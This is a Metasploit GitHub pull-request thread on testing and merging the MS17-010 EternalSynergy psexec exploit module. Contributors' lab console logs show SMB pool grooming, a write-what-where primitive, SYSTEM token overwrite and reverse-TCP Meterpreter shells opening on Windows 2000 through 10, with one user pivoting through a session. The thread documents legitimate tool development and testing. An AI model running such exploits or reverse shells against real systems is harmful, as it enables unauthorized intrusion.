/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/pentest/exploit/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/pentest/exploit/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
[*] Meterpreter session 4 opened (172.16.191.244:4444 -> 172.16.191.160:1027) at 2018-01-29 07:18:14 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2000PRO
OS              : Windows 2000 (Build 2195).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
@iNoSec

iNoSec commented Jan 31, 2018

How can we merge your branch to help you with testing? Sorry, new to GitHub.

@zerosum0x0

Contributor

zerosum0x0 commented Jan 31, 2018

@bwatters-r7 very interested in all service packs of Server 2003 actually. Could have similar issues as XP did.

@iNoSec something like (untested)

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git remote add rs https://github.com/RiskSense-Ops/metasploit-framework/
git pull rs eternalsynergy
@bwatters-r7

Contributor

bwatters-r7 commented Feb 1, 2018

FYI, tests still running, but Win2003x86_SP0 succeeded.

Win2003x64_SP1 failed; debug output:

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              true             yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                 192.168.136.121  yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               [REDACTED]     no        The password for the specified username
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.112  yes       The listen address
   LPORT     30001            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


[*] resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> Ruby Code (13 bytes)
resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> check
[*] 192.168.136.121:445 This module does not support check.
resource (/home/msfuser/rapid7/test_artifacts/test_rc/exploit-windows-smb-ms17_010_psexec_192.168.136.121_30001.rc)> run -z
[*] Started reverse TCP handler on 192.168.135.112:30001 
[*] 192.168.136.121:445 - Target OS: Windows Server 2003 3790 Service Pack 1
[*] 192.168.136.121:445 - Connected to named pipe: netlogon
[*] 192.168.136.121:445 - Filling barrel with fish... done
[*] 192.168.136.121:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.136.121:445 - 	[*] Preparing dynamite...
[*] 192.168.136.121:445 - Attempt controlling next transaction on 
[*] 192.168.136.121:445 - 		Trying stick 1 (x86)...Miss
[-] 192.168.136.121:445 - NoMethodError
[-] 192.168.136.121:445 - undefined method `[]' for nil:NilClass
[-] 192.168.136.121:445 - /home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:657:in `block in exploit_fish_barrel'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:655:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:655:in `exploit_fish_barrel'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:40:in `eternal_pwn'
/home/msfuser/rapid7/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:99:in `exploit'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/home/msfuser/rapid7/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/home/msfuser/rapid7/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/home/msfuser/rapid7/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:360:in `load_resource'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:218:in `block in initialize'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:217:in `each'
/home/msfuser/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:217:in `initialize'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/home/msfuser/rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'

Other tests still running.

@zerosum0x0

Contributor

zerosum0x0 commented Feb 1, 2018

Woops. Wrong key when adding x64 to dynamite list, try Win2003x64_SP1 again please.

@bwatters-r7

Contributor

bwatters-r7 commented Feb 1, 2018

Roger. The tests are scripted, but it will grab the most up-to-date version of the code for the PR, so your new push would have been used on the next OS.

Here are the results so far:
Win2003x86_SP0
PASSED
Win2003x64_SP1
FAILED - already mentioned
Win2003x86_SP1
PASSED
Win2003x86_R2_SP1
PASSED
Win2003x86_R2_SP2
PASSED
Win2008x86_SP1
FAILED - netlogon service timeout, will try again
Win2008x64
PASSED
Win2008x64_R2_SP1
FAILED - test system failure; will try again

@iNoSec

iNoSec commented Feb 1, 2018

@bwatters-r7 can you tell me how you add it to the framework, please?

@bcoles

Contributor

bcoles commented Feb 1, 2018

@iNoSec something like (untested)

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git remote add rs https://github.com/RiskSense-Ops/metasploit-framework/
git pull rs eternalsynergy

Or alternatively:

git clone https://github.com/rapid7/metasploit-framework/
cd metasploit-framework
git fetch origin pull/9473/head:eternalsynergy
git checkout eternalsynergy

@bwatters-r7

Contributor

bwatters-r7 commented Feb 1, 2018

After checking the Win2008x86_SP1 VM, I noticed I forgot to disable Windows Firewall when I set it up originally. Disabled it, reset and re-ran all tests last night:

Win2003x86_SP0
PASSED
Win2003x64_SP1
PASSED
Win2003x86_SP1
PASSED
Win2003x86_R2_SP1
PASSED
Win2003x86_R2_SP2
PASSED
Win2008x86_SP1
PASSED
Win2008x64
PASSED
Win2008x64_R2_SP1
PASSED

@busterb

Contributor

busterb commented Feb 2, 2018

So we have just 3 more OSes to test to land this?

@zerosum0x0

Contributor

zerosum0x0 commented Feb 2, 2018

Success on Windows 10 Enterprise 10240 x64 authenticated/native target

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.127:4444 
[*] 192.168.1.105:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.105:445 - Connected to named pipe: netlogon
[*] 192.168.1.105:445 - Frag pool info leak: arch=x64, size=0x20
[*] 192.168.1.105:445 - GROOM_POOL_SIZE: 0x5030
[*] 192.168.1.105:445 - BRIDE_TRANS_SIZE: 0xf90
[*] 192.168.1.105:445 - Attempting leak #0
[*] 192.168.1.105:445 - CONNECTION: 0xffffe00180ae1020
[*] 192.168.1.105:445 - SESSION: 0xffffc0007c5e0390
[*] 192.168.1.105:445 - FLINK: 0xffffc0007487f048
[*] 192.168.1.105:445 - InParam: 0xffffc0007c05416c
[*] 192.168.1.105:445 - MID: 0x4307
[-] 192.168.1.105:445 - Unexpected Flink alignment, delta: -77d5fb8
[*] 192.168.1.105:445 - Align transaction and leak failed, attempt #0
[*] 192.168.1.105:445 - Attempting leak #1
[*] 192.168.1.105:445 - CONNECTION: 0xffffe00180ae1020
[*] 192.168.1.105:445 - SESSION: 0xffffc0007c5e0390
[*] 192.168.1.105:445 - FLINK: 0xffffc0007c06c098
[*] 192.168.1.105:445 - InParam: 0xffffc0007c06616c
[*] 192.168.1.105:445 - MID: 0x4303
[*] 192.168.1.105:445 - Leaked connection struct (0xffffe00180ae1020), performing WriteAndX type confusion
[*] 192.168.1.105:445 - Control of groom transaction
[*] 192.168.1.105:445 - Built a write-what-where primitive...
[*] 192.168.1.105:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xffffc0007c5e045a
[*] 192.168.1.105:445 - session dat len = 256
[*] 192.168.1.105:445 - Session ctx offset = b0
[*] 192.168.1.105:445 - Session ctx data = 50d0057900c0ffff0411020000080000020000000100010000000001000000000000000000000000190000000c00000000000000000000002a0000000000000000000000000000000000000000000000
[*] 192.168.1.105:445 - secCtxAddr: ffffc0007905d050
[*] 192.168.1.105:445 - Reading secCtxData from ffffc0007905d050
[*] 192.168.1.105:445 - Read data from secCtx: 2a023800030000000300000000000000e09ebd7300c0ffff0000000000000000000000000000000000000000000000000000000000000000
[*] 192.168.1.105:445 - Overwrote token SID security context with fake context
[+] 192.168.1.105:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.105:445 - Powershell command length: 2537
[*] 192.168.1.105:445 - Executing the payload...
[*] 192.168.1.105:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.105[\svcctl] ...
[*] 192.168.1.105:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.105[\svcctl] ...
[*] 192.168.1.105:445 - Obtaining a service manager handle...
[*] 192.168.1.105:445 - Creating the service...
[+] 192.168.1.105:445 - Successfully created the service
[*] 192.168.1.105:445 - Starting the service...
[+] 192.168.1.105:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.1.105:445 - Removing the service...
[+] 192.168.1.105:445 - Successfully removed the service
[*] 192.168.1.105:445 - Closing service handle...
[*] Sending stage (205891 bytes) to 192.168.1.105
[*] Meterpreter session 7 opened (192.168.1.127:4444 -> 192.168.1.105:49484) at 2018-02-01 20:28:46 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IL17M8C
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

@zerosum0x0

Contributor

zerosum0x0 commented Feb 2, 2018

Success on Windows 10 Enterprise 10240 x86 authenticated/native target

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.127:4444 
[*] 192.168.1.249:445 - Target OS: Windows 10 Enterprise 10240
[*] 192.168.1.249:445 - Connected to named pipe: netlogon
[*] 192.168.1.249:445 - Frag pool info leak: arch=x86, size=0x10
[*] 192.168.1.249:445 - GROOM_POOL_SIZE: 0x5020
[*] 192.168.1.249:445 - BRIDE_TRANS_SIZE: 0xfc0
[*] 192.168.1.249:445 - Attempting leak #0
[*] 192.168.1.249:445 - CONNECTION: 0x8d2334f0
[*] 192.168.1.249:445 - SESSION: 0xa006c648
[*] 192.168.1.249:445 - FLINK: 0xad791058
[*] 192.168.1.249:445 - InParam: 0xad78b0e4
[*] 192.168.1.249:445 - MID: 0x4403
[*] 192.168.1.249:445 - Leaked connection struct (0x8d2334f0), performing WriteAndX type confusion
[*] 192.168.1.249:445 - Control of groom transaction
[*] 192.168.1.249:445 - Built a write-what-where primitive...
[*] 192.168.1.249:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xa006c6e6
[*] 192.168.1.249:445 - session dat len = 256
[*] 192.168.1.249:445 - Session ctx offset = 88
[*] 192.168.1.249:445 - Session ctx data = c8c306a004110200000800000200000001000100000000010000000000000000010000000800000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[*] 192.168.1.249:445 - secCtxAddr: a006c3c8
[*] 192.168.1.249:445 - Reading secCtxData from a006c3c8
[*] 192.168.1.249:445 - Read data from secCtx: 2a022400030000000300000040ca888e0000000000000000000000000000000000000000
[*] 192.168.1.249:445 - Overwrote token SID security context with fake context
[+] 192.168.1.249:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.249:445 - Powershell command length: 2388
[*] 192.168.1.249:445 - Executing the payload...
[*] 192.168.1.249:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.249[\svcctl] ...
[*] 192.168.1.249:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.249[\svcctl] ...
[*] 192.168.1.249:445 - Obtaining a service manager handle...
[*] 192.168.1.249:445 - Creating the service...
[+] 192.168.1.249:445 - Successfully created the service
[*] 192.168.1.249:445 - Starting the service...
[+] 192.168.1.249:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.1.249:445 - Removing the service...
[+] 192.168.1.249:445 - Successfully removed the service
[*] 192.168.1.249:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 192.168.1.249
[*] Meterpreter session 8 opened (192.168.1.127:4444 -> 192.168.1.249:49506) at 2018-02-01 20:36:33 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-G60M8SH
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@rootsecdev

rootsecdev commented Feb 2, 2018

I've confirmed Windows Vista x64 is working.

msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.206.128:4444
[*] 192.168.206.129:445 - Target OS: Windows Vista (TM) Business 6000
[*] 192.168.206.129:445 - Filling barrel with fish... done
[*] 192.168.206.129:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.206.129:445 - [*] Preparing dynamite...
[*] 192.168.206.129:445 - [*] Trying stick 1 (x64)...Boom!
[*] 192.168.206.129:445 - [+] Successfully Leaked Transaction!
[*] 192.168.206.129:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.206.129:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.206.129:445 - Reading from CONNECTION struct at: 0xfffffa80083a6ba0
[*] 192.168.206.129:445 - Built a write-what-where primitive...
[+] 192.168.206.129:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.206.129:445 - Selecting native target
[*] 192.168.206.129:445 - Uploading payload...
[*] 192.168.206.129:445 - Created \xwMEdFGQ.exe...
[+] 192.168.206.129:445 - Service started successfully...
[*] 192.168.206.129:445 - Deleting \xwMEdFGQ.exe...
[*] Sending stage (179779 bytes) to 192.168.206.129
[*] Meterpreter session 2 opened (192.168.206.128:4444 -> 192.168.206.129:49159) at 2018-02-01 22:21:05 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : VISTA1
OS              : Windows Vista (Build 6000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@wvu-r7

Contributor

wvu-r7 commented Feb 2, 2018

Thanks for all the testing, folks! I think we can leave the remaining to-dos for the next PR. Let us know when you're ready to ship this, @zerosum0x0. 👍

@zerosum0x0

Contributor

zerosum0x0 commented Feb 2, 2018

@wvu-r7 Seems good to me

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request Feb 2, 2018

@wvu-r7 wvu-r7 merged commit ffc7e07 into rapid7:master Feb 2, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
@wvu-r7

Contributor

wvu-r7 commented Feb 2, 2018

Release Notes

Auxiliary and exploit modules for EternalSynergy, EternalRomance, and EternalChampion have been added to the framework. The exploits/windows/smb/ms17_010_psexec module exploits SMB with vulnerabilities in MS17-010 to give you the ability to run any command as SYSTEM or stage Meterpreter. This exploit is more reliable than the EternalBlue exploit, but requires a named pipe.

@zerosum0x0 zerosum0x0 deleted the RiskSense-Ops:eternalsynergy branch Feb 2, 2018

jmartin-r7 added a commit to jmartin-r7/metasploit-framework that referenced this pull request Feb 2, 2018

@rapid7 rapid7 deleted a comment from hktalent Feb 7, 2018

@busterb

Contributor

busterb commented Feb 7, 2018

As a general public service announcement:

If you would like to use this module, you need to use a version of Metasploit that already has it packaged, or wait until your Linux distribution is shipping it. Just copying the module file will not work on an older version of Metasploit Framework.

This is also a closed PR. If you have bugs, file them as new tickets. If you have general questions or need help, ask on IRC, slack, or in a help forum. You can find information on these channels at https://metasploit.com.

Thanks!

@hktalent

hktalent commented Feb 7, 2018

@zerosum0x0 @bcoles @wvu-r7 @ronnieflip @mkienow-r7

route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.0.0        Session 86


set ReverseAllowProxy true


msf exploit(windows/smb/ms17_010_psexec) > [*] 192.168.10.102:445 - Target OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[-] 192.168.10.102:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 192.168.10.102:445 - Unable to find accessible named pipe!

@bcoles

Contributor

bcoles commented Feb 7, 2018

@hktalent This PR is closed. Please create a new issue.

@rapid7 rapid7 locked as resolved and limited conversation to collaborators Feb 7, 2018
